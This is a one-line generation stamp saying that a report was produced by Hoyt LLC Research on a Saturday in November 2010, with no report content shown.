Report generated by Hoyt LLC Research at Sat Nov 20 12:17:11 CST 2010.